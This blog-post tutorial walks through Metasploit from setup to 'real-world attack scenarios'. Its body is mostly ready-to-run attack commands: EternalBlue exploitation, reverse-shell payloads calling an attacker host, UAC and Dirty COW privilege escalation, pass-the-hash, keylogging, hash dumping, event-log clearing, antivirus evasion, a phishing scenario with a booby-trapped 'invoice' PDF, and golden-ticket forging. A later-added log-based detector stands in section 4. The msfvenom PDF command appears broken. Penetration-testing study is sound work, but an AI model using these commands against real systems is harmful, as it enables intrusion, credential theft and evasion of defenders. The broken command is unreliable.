Sunday, 29 June 2025

The Ultimate Metasploit Mastery Guide: Basic to Advanced, Part 1


The Ultimate Metasploit Mastery Guide: From Basics to Advanced Exploitation

Introduction

Metasploit is the most widely used penetration testing framework, offering powerful tools for exploit development, vulnerability scanning, post-exploitation, and automation. Whether you're a beginner or an advanced security professional, this guide will take you from basic commands to advanced real-world attack scenarios.


Table of Contents

  1. Getting Started with Metasploit

  2. Basic Commands & Exploitation

  3. Payloads & Meterpreter

  4. Post-Exploitation Techniques

  5. Advanced Exploitation & Evasion

  6. Automation & Scripting

  7. Real-World Attack Scenarios

  8. Final Tips & Best Practices


1. Getting Started with Metasploit

What is Metasploit?

Metasploit is an open-source penetration testing framework that provides:

  • Exploits (Code to take advantage of vulnerabilities)

  • Payloads (Malicious code executed after exploitation)

  • Auxiliary modules (Scanners, fuzzers, DoS attacks)

  • Post-exploitation tools (Privilege escalation, pivoting, data exfiltration)

Installation & Setup

bash
# Kali Linux (Pre-installed)
msfconsole

# Ubuntu/Debian
sudo apt install metasploit-framework
msfdb init
msfconsole

2. Basic Commands & Exploitation

Essential Metasploit Commands

Command                   Description
msfconsole                Start Metasploit
search <keyword>          Find modules (e.g., search eternalblue)
use <module>              Load a module (e.g., use exploit/windows/smb/ms17_010_eternalblue)
show options              View required settings
set <option> <value>      Configure the module (e.g., set RHOSTS 192.168.1.100)
run or exploit            Launch the exploit
sessions -l               List active sessions
sessions -i <ID>          Interact with a session

Step-by-Step Exploitation

  1. Search for an exploit:

    bash
    search ms17_010
  2. Load and configure the exploit:

    bash
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOSTS 192.168.1.100
    set LHOST 192.168.1.5
  3. Set a payload (optional):

    bash
    set payload windows/x64/meterpreter/reverse_tcp
  4. Launch the attack:

    bash
    exploit

3. Payloads & Meterpreter

Types of Payloads

Payload Type    Example                                  Use Case
Staged          windows/meterpreter/reverse_tcp          Evades detection
Non-staged      windows/shell_reverse_tcp                Faster execution
Meterpreter     windows/x64/meterpreter_reverse_https    Advanced post-exploitation

Generating Payloads with msfvenom

bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe -o payload.exe

Meterpreter Essentials

Command          Description
sysinfo          Get system details
getuid           Check current user
ps               List running processes
migrate <PID>    Move to another process
hashdump         Dump password hashes
keyscan_start    Start keylogger
screenshot       Capture screen
clearev          Clear event logs

4. Post-Exploitation Techniques

Privilege Escalation

Windows

bash
# Check for local exploits
run post/multi/recon/local_exploit_suggester

# Bypass UAC
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
exploit

Linux

bash
# Check SUID binaries
run post/linux/gather/enum_suid

# Exploit Dirty Cow
use exploit/linux/local/dirtycow
set SESSION 1
exploit

Lateral Movement

Technique          Command
Pass-the-Hash      use exploit/windows/smb/psexec + set SMBPass <NTLM>
RDP Hijacking      run post/windows/manage/rdp_hijack
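Two of the commands above leave well-known traces on the target: Meterpreter's clearev clears the Windows event logs, which Windows itself records as Security event 1102 ("The audit log was cleared") and System event 104, and the psexec pass-the-hash module authenticates over NTLM (Security 4624, logon type 3) and then installs a service (System 7045). The following is an added defender-side example, not code from the original post: a small Python detector that applies those two rules to constructed JSON-lines event records. The flat field names (Channel, EventID, LogonType, AuthPackage, ServiceName) are assumed to match whatever export your log pipeline produces; the sample events are constructed.

```python
import json

# Constructed sample events (JSON lines, oldest first), not real telemetry.
# Field names are assumed for this example; adapt them to your log export.
SAMPLE_EVENTS = """\
{"Channel":"System","EventID":7045,"ServiceName":"Backup Agent","AccountName":"LocalSystem"}
{"Channel":"Security","EventID":4624,"LogonType":3,"AuthPackage":"NTLM","TargetUser":"admin","IpAddress":"192.168.1.5"}
{"Channel":"System","EventID":7045,"ServiceName":"MSSEWkjPQl","AccountName":"LocalSystem"}
{"Channel":"Security","EventID":1102,"SubjectUser":"admin"}
{"Channel":"System","EventID":104,"SubjectUser":"admin"}
{"Channel":"Security","EventID":4624,"LogonType":2,"AuthPackage":"Kerberos","TargetUser":"alice","IpAddress":"-"}
"""

# (channel, event id) pairs Windows writes when an event log is cleared
LOG_CLEARED = {("Security", 1102), ("System", 104)}


def parse_events(text):
    """Parse JSON-lines event records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events, window=5):
    """Return (rule, event) pairs. `window` is how many earlier events are
    searched for the NTLM network logon that precedes a psexec-style
    service installation."""
    findings = []
    for i, ev in enumerate(events):
        key = (ev.get("Channel"), ev.get("EventID"))
        if key in LOG_CLEARED:
            findings.append(("event_log_cleared", ev))
        if key == ("System", 7045):
            recent = events[max(0, i - window):i]
            if any(e.get("EventID") == 4624 and e.get("LogonType") == 3
                   and e.get("AuthPackage") == "NTLM" for e in recent):
                findings.append(("ntlm_logon_then_service_install", ev))
    return findings


if __name__ == "__main__":
    for rule, ev in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{rule}: {ev}")
```

The first service (Backup Agent) is not reported because no NTLM network logon precedes it; the randomly named one is, and both log-clearing events are flagged.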

5. Advanced Exploitation & Evasion

Custom Exploit Development

  1. Copy a template:

    bash
    cp /usr/share/metasploit-framework/modules/exploits/example.rb ~/.msf4/modules/exploits/custom/my_exploit.rb
  2. Edit the exploit (Define target, bad characters, etc.)

  3. Reload Metasploit:

    bash
    reload_all

AV & EDR Evasion

Technique            Command
Payload Encoding     msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5
HTTPS Payload        set payload windows/meterpreter/reverse_https
Process Injection    migrate -N explorer.exe

6. Automation & Scripting

Resource Scripts (.rc Files)

bash
# auto_exploit.rc
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set LHOST 192.168.1.5
exploit

Run with:

bash
msfconsole -r auto_exploit.rc

Metasploit API (Python Automation)

python
import msfrpc

# Requires a running msfrpcd whose credentials match the login below
client = msfrpc.Msfrpc({})
client.login('msf', 'password')

# console.write needs a console ID, so create a console first;
# console.create returns the new console's id
console_id = client.call('console.create')['id']
client.call('console.write', [console_id, 'use exploit/windows/smb/ms17_010_eternalblue\n'])

# Read back what the console printed in response
print(client.call('console.read', [console_id])['data'])

7. Real-World Attack Scenarios

Scenario 1: Phishing + Meterpreter Payload

  1. Generate a malicious PDF:

    bash
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 -f pdf -o invoice.pdf
  2. Send phishing email with attachment.

  3. Handle the callback:

    bash
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    exploit

Scenario 2: Active Directory Exploitation

  1. Dump hashes with Mimikatz:

    bash
    load kiwi
    lsa_dump_sam
  2. Golden Ticket Attack:

    bash
    golden_ticket_create -d <domain> -k <krbtgt_hash> -u <fake_user> -s <SID>

8. Final Tips & Best Practices

✅ Always update Metasploit: msfupdate
✅ Use check before exploiting: check
✅ Automate repetitive tasks (.rc scripts, Python API)
✅ Practice legally (TryHackMe, HackTheBox, VulnHub)


Conclusion

This guide covers everything from basic commands to advanced exploitation. Whether you're a beginner or an expert, mastering Metasploit will significantly enhance your penetration testing skills.

What’s next?

  • Try HackTheBox machines to practice.

  • Explore custom exploit development.

  • Learn C2 frameworks (Cobalt Strike, Sliver) for advanced red teaming.

🚀 Happy Hacking! 🚀
